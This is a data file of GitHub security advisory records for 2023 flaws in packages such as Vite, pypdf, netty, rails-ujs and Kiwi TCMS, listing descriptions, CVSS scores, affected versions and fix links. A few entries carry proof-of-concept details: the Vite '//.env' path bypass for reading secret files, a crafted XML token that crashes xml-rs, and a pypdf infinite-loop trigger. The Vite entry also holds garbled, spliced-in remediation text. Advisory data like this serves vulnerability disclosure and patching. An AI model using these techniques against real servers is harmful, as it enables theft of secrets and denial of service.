1.4.0 | GHSA-fmrf-p77g-vv5c | 2023-07-07T16:30:42Z | 2023-06-30T18:31:02Z | null | ['CVE-2023-37302'] | MediaWiki Cross-site Scripting vulnerability | An issue was discovered in SiteLinksView.php in Wikibase in MediaWiki through 1.39.3. There is XSS via a crafted badge title attribute. This is also related to lack of escaping in wbTemplate (from resources/wikibase/templates.js) for quotes (which can be in a title attribute). | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'wikibase/wikibase'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.39.3'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37302'}, {'type': 'WEB', 'url': 'https://gerrit.wikimedia.org/r/c/mediawiki/extensions/Wikibase/+/933649'}, {'type': 'WEB', 'url': 'https://gerrit.wikimedia.org/r/c/mediawiki/extensions/Wikibase/+/933650'}, {'type': 'PACKAGE', 'url': 'https://github.com/wikimedia/mediawiki'}, {'type': 'WEB', 'url': 'https://phabricator.wikimedia.org/T339111'}] | {'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:25:26Z', 'nvd_published_at': None} |
1.4.0 | GHSA-6mjq-h674-j845 | 2023-06-23T13:56:06Z | 2023-06-20T16:33:22Z | null | ['CVE-2023-34462'] | netty-handler SniHandler 16MB allocation | ### Summary
The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` to allocate 16MB of heap.
### Details
The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the indicated server name by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record.
Normally the value of the packet should be smaller than the handshake packet but there are not checks done here and the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`
1/ allocate a 16MB `ByteBuf`
2/ not fail `decode` method `in` buffer
3/ get out of the loop without an exception
The combination of this without the use of a timeout makes easy to connect to a TCP server and allocate 16MB of heap memory per connection.
### Impact
If the user has no idle timeout handler configured it might be possible for a remote peer to send a client hello packet which lead the server to buffer up to 16MB of data per connection. This could lead to a OutOfMemoryError and so result in a DDOS. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty-handler'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.94.Final'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/netty/netty/security/advisories/GHSA-6mjq-h674-j845'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34462'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/commit/535da17e45201ae4278c0479e6162bb4127d4c32'}, {'type': 'PACKAGE', 'url': 'https://github.com/netty/netty'}] | {'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-20T16:33:22Z', 'nvd_published_at': None} |
1.4.0 | GHSA-wfg4-322g-9vqv | 2023-06-21T22:06:29Z | 2023-06-21T22:06:29Z | null | [] | memoffset allows reading uninitialized memory | memoffset allows attempt of reading data from address `0` with arbitrary type. This behavior is an undefined behavior because address `0` to `std::mem::size_of<T>` may not have valid bit-pattern with `T`. Old implementation dereferences uninitialized memory obtained from `std::mem::align_of`. Older implementation prior to it allows using uninitialized data obtained from `std::mem::uninitialized` with arbitrary type then compute offset by taking the address of field-projection. This may also result in an undefined behavior for "father" that includes (directly or transitively) type that [does not allow to be uninitialized](https://doc.rust-lang.org/nightly/reference/behavior-considered-undefined.html).
This flaw was corrected by using `std::ptr::addr_of` in <https://github.com/Gilnaa/memoffset/pull/50>.
| [] | [{'package': {'ecosystem': 'crates.io', 'name': 'memoffset'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.2'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/Gilnaa/memoffset/issues/24'}, {'type': 'WEB', 'url': 'https://github.com/Gilnaa/memoffset/pull/50'}, {'type': 'PACKAGE', 'url': 'https://github.com/Gilnaa/memoffset'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0045.html'}] | {'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T22:06:29Z', 'nvd_published_at': None} |
1.4.0 | GHSA-2fqm-m4r2-fh98 | 2023-06-06T16:46:16Z | 2023-06-06T16:46:16Z | null | ['CVE-2023-33977'] | kiwitcms vulnerable to stored cross-site scripting via unrestricted file upload | ### Impact
Kiwi TCMS allows users to upload attachments to test plans, test cases, etc. Earlier versions of Kiwi TCMS had introduced upload validators in order to prevent potentially dangerous files from being uploaded and Content-Security-Policy definition to prevent cross-site-scripting attacks.
The upload validation checks were not 100% robust which left the possibility to circumvent them and upload a potentially dangerous file which allows execution of arbitrary JavaScript in the browser. Additionally we've discovered that Nginx's `proxy_pass` directive will strip some headers negating protections built into Kiwi TCMS when served behind a reverse proxy.
### Patches
- Improved file upload validation code
- Updated Nginx reverse proxy configuration for ***.tenant.kiwitcms.org**
### Workarounds
If serving Kiwi TCMS behind a reverse proxy make sure that additional header values are still passed to the client browser. If they aren't redefine them inside the proxy configuration. See [etc/nginx.conf#L66-L68](https://github.com/kiwitcms/Kiwi/blob/master/etc/nginx.conf#L66-L68) and [etc/nginx.conf#L87](https://github.com/kiwitcms/Kiwi/blob/master/etc/nginx.conf#L87)
### References
Disclosed by [M Nadeem Qazi](https://huntr.dev/bounties/6aea9a26-e29a-467b-aa5a-f767f0c2ec96/). | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}] | [{'package': {'ecosystem': 'PyPI', 'name': 'kiwitcms'}, 'ecosystem_specific': {'affected_functions': ['tcms.kiwi_attachments.validators.deny_uploads_containing_script_tag']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 12.3'}}] | [{'type': 'WEB', 'url': 'https://github.com/kiwitcms/Kiwi/security/advisories/GHSA-2fqm-m4r2-fh98'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33977'}, {'type': 'WEB', 'url': 'https://github.com/kiwitcms/kiwi/commit/d789f4b51025de4f8c747c037d02e1b0da80b034'}, {'type': 'PACKAGE', 'url': 'https://github.com/kiwitcms/Kiwi'}, {'type': 'WEB', 'url': 'https://github.com/kiwitcms/Kiwi/blob/master/etc/nginx.conf#L66-L68'}, {'type': 'WEB', 'url': 'https://github.com/kiwitcms/Kiwi/blob/master/etc/nginx.conf#L87'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/6aea9a26-e29a-467b-aa5a-f767f0c2ec96/'}, {'type': 'WEB', 'url': 'https://kiwitcms.org/blog/kiwi-tcms-team/2023/06/06/kiwi-tcms-124/'}] | {'cwe_ids': ['CWE-434', 'CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T16:46:16Z', 'nvd_published_at': None} |
1.4.0 | GHSA-jr66-9ghf-6gp3 | 2023-06-16T17:56:21Z | 2023-06-11T12:30:16Z | null | ['CVE-2023-3192'] | Froxlor Session Fixation vulnerability | Versions of froxlor/froxlor prior to release 2.1.0 did not regenerate session ids appropriately which may result in session fixation. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'froxlor/froxlor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.0'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3192'}, {'type': 'WEB', 'url': 'https://github.com/froxlor/froxlor/commit/94d9c3eedf31bc8447e3aa349e32880dde02ee52'}, {'type': 'PACKAGE', 'url': 'https://github.com/froxlor/froxlor'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/f3644772-9c86-4f55-a0fa-aeb11f411551'}] | {'cwe_ids': ['CWE-384'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-12T18:38:30Z', 'nvd_published_at': None} |
1.4.0 | GHSA-xp5h-f8jf-rc8q | 2023-06-09T22:41:16Z | 2023-06-09T22:41:16Z | null | ['CVE-2023-23913'] | rails-ujs vulnerable to DOM Based Cross-site Scripting contenteditable HTML Elements | NOTE: rails-ujs is part of Rails/actionview since 5.1.0.
There is a potential DOM based cross-site scripting issue in rails-ujs
which leverages the Clipboard API to target HTML elements that are
assigned the contenteditable attribute. This has the potential to
occur when pasting malicious HTML content from the clipboard that
includes a data-method, data-remote or data-disable-with attribute.
This vulnerability has been assigned the CVE identifier CVE-2023-23913.
Not affected: < 5.1.0
Versions Affected: >= 5.1.0
Fixed Versions: 6.1.7.3, 7.0.4.3
Impact
If the specified malicious HTML clipboard content is provided to a
contenteditable element, this could result in the arbitrary execution
of javascript on the origin in question.
Releases
The FIXED releases are available at the normal locations.
Workarounds
We recommend that all users upgrade to one of the FIXED versions.
In the meantime, users can attempt to mitigate this vulnerability
by removing the contenteditable attribute from elements in pages
that rails-ujs will interact with.
Patches
To aid users who aren’t able to upgrade immediately we have provided
patches for the two supported release series. They are in git-am
format and consist of a single changeset.
* rails-ujs-data-method-contenteditable-6-1.patch - Patch for 6.1 series
* rails-ujs-data-method-contenteditable-7-0.patch - Patch for 7.0 series
Please note that only the 7.0.Z and 6.1.Z series are
supported at present, and 6.0.Z for severe vulnerabilities.
Users of earlier unsupported releases are advised to upgrade as
soon as possible as we cannot guarantee the continued availability
of security fixes for unsupported releases.
Credits
We would like to thank ryotak 15 for reporting this!
* rails-ujs-data-method-contenteditable-6-1.patch (8.5 KB)
* rails-ujs-data-method-contenteditable-7-0.patch (8.5 KB)
* rails-ujs-data-method-contenteditable-main.patch (8.9 KB)
| [] | [{'package': {'ecosystem': 'RubyGems', 'name': 'actionview'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.0'}, {'fixed': '6.1.7.3'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'actionview'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.4.3'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/rails/rails/commit/5037a13614d71727af8a175063bcf6ba1a74bdbd'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/commit/73009ea59a811b28e8ec2a9c9bc24635aa891214'}, {'type': 'WEB', 'url': 'https://discuss.rubyonrails.org/t/cve-2023-23913-dom-based-cross-site-scripting-in-rails-ujs-for-contenteditable-html-elements/82468'}, {'type': 'PACKAGE', 'url': 'https://github.com/rails/rails'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionview/CVE-2023-23913.yml'}] | {'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T22:41:16Z', 'nvd_published_at': None} |
1.4.0 | GHSA-p2qf-9vp6-3jjq | 2023-06-26T22:41:59Z | 2023-06-15T15:30:15Z | null | ['CVE-2023-3276'] | HuTool XML parsing module has blind XXE vulnerability | A vulnerability, which was classified as problematic, has been found in Dromara HuTool up to 5.8.19. Affected by this issue is the function readBySax of the file XmlUtil.java of the component XML Parsing Module. The manipulation leads to xml external entity reference. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}] | [{'package': {'ecosystem': 'Maven', 'name': 'cn.hutool:hutool-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.8.19'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3276'}, {'type': 'WEB', 'url': 'https://fbdhhhh47.github.io/2023/06/06/hutool-XXE/'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.231626'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.231626'}] | {'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-16T19:39:29Z', 'nvd_published_at': None} |
1.4.0 | GHSA-7grw-xfx6-qhx6 | 2023-07-06T21:39:16Z | 2023-06-30T15:30:22Z | null | ['CVE-2023-37298'] | Joplin Cross-site Scripting vulnerability | Joplin before 2.11.5 allows XSS via a USE element in an SVG document. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'npm', 'name': 'joplin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.5'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37298'}, {'type': 'WEB', 'url': 'https://github.com/laurent22/joplin/commit/caf66068bfc474bbfd505013076ed173cd90ca83'}, {'type': 'PACKAGE', 'url': 'https://github.com/laurent22/joplin'}, {'type': 'WEB', 'url': 'https://github.com/laurent22/joplin/releases/tag/v2.11.5'}, {'type': 'WEB', 'url': 'https://vuln.ryotak.net/advisories/69'}] | {'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:39:28Z', 'nvd_published_at': None} |
1.4.0 | GHSA-r7wr-4w5q-55m6 | 2023-06-16T17:47:56Z | 2023-06-16T17:47:56Z | null | ['CVE-2023-34242'] | Cilium vulnerable to information leakage via incorrect ReferenceGrant handling | ### Impact
When the [Gateway API](https://docs.cilium.io/en/v1.13/network/servicemesh/gateway-api/gateway-api/) is enabled in Cilium, the absence of a check on the namespace in which a [ReferenceGrant](https://gateway-api.sigs.k8s.io/api-types/referencegrant/) is created could result in Cilium gaining visibility of secrets (including certificates) and services across namespaces.
An attacker on an affected cluster can configure Cilium to use cluster secrets or communicate with services that it should not have access to.
Gateway API functionality is disabled by default.
### Patches
This vulnerability is fixed in Cilium release 1.13.4.
Cilium versions <1.13 are not affected.
### Workarounds
There is no workaround to this issue.
### Acknowledgements
The Cilium community has worked together with members of Isovalent to prepare these mitigations. Special thanks to @meyskens for investigating and fixing the issue.
### For more information
If you have any questions or comments about this advisory, please reach out on [Slack](https://docs.cilium.io/en/latest/community/community/#slack).
As usual, if you think you found a related vulnerability, we strongly encourage you to report security vulnerabilities to our private security mailing list: [security@cilium.io](mailto:security@cilium.io) - first, before disclosing them in any public forums. This is a private mailing list where only members of the Cilium internal security team are subscribed to, and is treated as top priority.
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N'}] | [{'package': {'ecosystem': 'Go', 'name': 'github.com/cilium/cilium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.13.0'}, {'fixed': '1.13.4'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/cilium/cilium/security/advisories/GHSA-r7wr-4w5q-55m6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34242'}, {'type': 'PACKAGE', 'url': 'https://github.com/cilium/cilium'}, {'type': 'WEB', 'url': 'https://github.com/cilium/cilium/releases/tag/v1.13.4'}] | {'cwe_ids': ['CWE-200'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-16T17:47:56Z', 'nvd_published_at': None} |
1.4.0 | GHSA-j6v2-mwxm-f952 | 2023-07-06T21:39:34Z | 2023-06-29T21:30:29Z | null | ['CVE-2020-26709'] | py-xml XML External Entity Injection vulnerability | py-xml v1.0 was discovered to contain an XML External Entity Injection (XXE) vulnerability which allows attackers to execute arbitrary code via a crafted XML file. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'PyPI', 'name': 'py-xml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26709'}, {'type': 'WEB', 'url': 'https://github.com/PinaeOS/py-xml/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/PinaeOS/py-xml'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/py-xml/PYSEC-2023-95.yaml'}] | {'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:36:36Z', 'nvd_published_at': None} |
1.4.0 | GHSA-ch48-9r3q-pv7x | 2023-06-22T20:01:03Z | 2023-06-22T20:01:03Z | null | ['CVE-2023-25500'] | Vaadin vulnerable to possible information disclosure of class and method names in RPC response | ### Description
Possible information disclosure in Vaadin 10.0.0 to 10.0.23, 11.0.0 to 14.10.1, 15.0.0 to 22.0.28, 23.0.0 to 23.3.13, 24.0.0 to 24.0.6, 24.1.0.alpha1 to 24.1.0.rc2, resulting in potential information disclosure of class and method names in RPC responses by sending modified requests.
https://vaadin.com/security/cve-2023-25500 | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N'}] | [{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.21'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'fixed': '2.9.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '9.1.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '23.0.0'}, {'fixed': '23.3.13'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '24.0.0'}, {'fixed': '24.0.9'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '24.1.alpha1'}, {'fixed': '24.1.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.0.24'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '14.10.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0.0'}, {'fixed': '22.1.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '23.0.0'}, {'fixed': '23.3.14'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '24.0.0'}, {'fixed': '24.0.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '24.1.0.alpha1'}, {'fixed': '24.1.0'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/vaadin/platform/security/advisories/GHSA-ch48-9r3q-pv7x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25500'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/16935'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/platform'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2023-25500'}] | {'cwe_ids': ['CWE-1295', 'CWE-200'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T20:01:03Z', 'nvd_published_at': None} |
1.4.0 | GHSA-4vvm-4w3v-6mr8 | 2023-07-07T17:19:37Z | 2023-06-30T20:33:57Z | null | ['CVE-2023-36464'] | pypdf and PyPDF2 possible Infinite Loop when a comment isn't followed by a character | ### Impact
An attacker who uses this vulnerability can craft a PDF which leads to an infinite loop if `__parse_content_stream` is executed. This infinite loop blocks the current process and can utilize a single core of the CPU by 100%. It does not affect memory usage. That is, for example, the case if the user extracted text from such a PDF.
Example Code and a PDF that causes the issue:
```python
from pypdf import PdfReader
# https://objects.githubusercontent.com/github-production-repository-file-5c1aeb/3119517/11367871?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20230627%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230627T201018Z&X-Amz-Expires=300&X-Amz-Signature=d71c8fd9181c4875f0c04d563b6d32f1d4da6e7b2e6be2f14479ce4ecdc9c8b2&X-Amz-SignedHeaders=host&actor_id=1658117&key_id=0&repo_id=3119517&response-content-disposition=attachment%3Bfilename%3DMiFO_LFO_FEIS_NOA_Published.3.pdf&response-content-type=application%2Fpdf
reader = PdfReader("MiFO_LFO_FEIS_NOA_Published.3.pdf")
page = reader.pages[0]
page.extract_text()
```
The issue was introduced with https://github.com/py-pdf/pypdf/pull/969
### Patches
The issue was fixed with https://github.com/py-pdf/pypdf/pull/1828
### Workarounds
It is recommended to upgrade to `pypdf>=3.9.0`. PyPDF2 users should migrate to pypdf.
If you cannot update your version of pypdf, you should modify `pypdf/generic/_data_structures.py`:
```
OLD: while peek not in (b"\r", b"\n"):
NEW: while peek not in (b"\r", b"\n", b""):
``` | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'PyPI', 'name': 'pypdf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '3.9.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'PyPDF2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'last_affected': '3.0.1'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/py-pdf/pypdf/security/advisories/GHSA-4vvm-4w3v-6mr8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36464'}, {'type': 'WEB', 'url': 'https://github.com/py-pdf/pypdf/pull/1828'}, {'type': 'WEB', 'url': 'https://github.com/py-pdf/pypdf/pull/969'}, {'type': 'WEB', 'url': 'https://github.com/py-pdf/pypdf/commit/b0e5c689df689ab173df84dacd77b6fc3c161932'}, {'type': 'PACKAGE', 'url': 'https://github.com/py-pdf/pypdf'}, {'type': 'WEB', 'url': 'https://github.com/py-pdf/pypdf/releases/tag/3.9.0'}] | {'cwe_ids': ['CWE-835'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:33:57Z', 'nvd_published_at': None} |
1.4.0 | GHSA-7gf7-jv65-wjmh | 2023-06-13T22:40:01Z | 2023-06-05T06:30:15Z | null | ['CVE-2023-34411'] | xml-rs vulnerable to denial of service via invalid token in XML document | The xml-rs crate >= 0.8.9 and < 0.8.14 for Rust and Crab allows a denial of service (panic) via an invalid <! token (such as <!DOCTYPEs/%<!A nesting) in an XML document. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'crates.io', 'name': 'xml-rs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.8.9'}, {'fixed': '0.8.14'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34411'}, {'type': 'WEB', 'url': 'https://github.com/netvl/xml-rs/pull/226'}, {'type': 'WEB', 'url': 'https://github.com/00xc/xml-rs/commit/0f084d45aa53e4a27476961785f59f2bd7d59a9f'}, {'type': 'WEB', 'url': 'https://github.com/netvl/xml-rs/commit/014d808be900c85a0afc5ccdfe668be040d175aa'}, {'type': 'WEB', 'url': 'https://github.com/netvl/xml-rs/commit/c09549a187e62d39d40467f129e64abf32efc35c'}, {'type': 'PACKAGE', 'url': 'https://github.com/netvl/xml-rs'}, {'type': 'WEB', 'url': 'https://github.com/netvl/xml-rs/compare/0.8.13...0.8.14'}] | {'cwe_ids': ['CWE-617'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T02:06:58Z', 'nvd_published_at': None} |
1.4.0 | GHSA-353f-5xf4-qw67 | 2023-09-01T21:30:14Z | 2023-06-06T02:01:39Z | null | ['CVE-2023-34092'] | Vite Server Options (server.fs.deny) can be bypassed using double forward-slash (//) | ### Summary
The issue involves a security vulnerability in Vite, where the server options can be bypassed using a double forward slash (`//`). This vulnerability poses a potential security risk as it can allow unauthorized access to sensitive directories and files. This document outlines the steps to address and mitigate this issue. Adding Extra References : ## Steps to Fix. **Update Vite**:Ensure that you are using the latest version of Vite. Security issues like this are often fixed in newer releases.\n\n2. **Secure the Server Configuration**:In your `vite.config.js` file, review and update the server configuration options to restrict access to unauthorized requests or directories. For example:```javascript\n // vite.config.js\n export default { server: {\n fs: {\n deny: ['private-directory'] // Restrict access to specific directories
### Impact
Only users explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected, and only files in the immediate Vite project root folder could be exposed.
### Patches
Fixed in vite@4.3.9, vite@4.2.3, vite@4.1.5, vite@4.0.5
And in the latest minors of the previous two majors: vite@3.2.7, vite@2.9.16
### Details
Vite serve the application with under the root-path of the project while running on the dev mode. By default, vite using server options fs.deny to protected the sensitive information of the file. But, with simply double forward-slash, we can bypass this fs restriction.
### PoC
1. Create a new latest project of vite using any package manager. (here I'm using react and vue templates for tested and pnpm)
2. Serve the application on dev mode using pnpm run dev.
3. Directly access the file from url using double forward-slash (`//`) (e.g: `//.env`, `//.env.local`)
4. Server Options `fs.deny` restrict successfully bypassed.
Proof Images:
![proof-1](https://user-images.githubusercontent.com/30733517/241105344-6ecbc7f6-57b7-45c7-856a-6421a577dda1.png)
![proof-2](https://user-images.githubusercontent.com/30733517/241105349-ab9561e7-8aff-4f29-97f9-b784e673c122.png) | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}] | [{'package': {'ecosystem': 'npm', 'name': 'vite'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.9.16'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'vite'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.2'}, {'fixed': '3.2.7'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'vite'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.5'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'vite'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.5'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'vite'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'vite'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '4.3.9'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/vitejs/vite/security/advisories/GHSA-353f-5xf4-qw67'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34092'}, {'type': 'WEB', 'url': 'https://github.com/vitejs/vite/pull/13348'}, {'type': 'WEB', 'url': 'https://github.com/vitejs/vite/commit/813ddd6155c3d54801e264ba832d8347f6f66b32'}, {'type': 'PACKAGE', 'url': 'https://github.com/vitejs/vite'}, {'type': 'WEB', 'url': 'https://security.snyk.io/package/npm/vite/3.2.0-beta.4'}] | {'cwe_ids': ['CWE-200', 'CWE-50', 'CWE-706'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T02:01:39Z', 'nvd_published_at': None} |
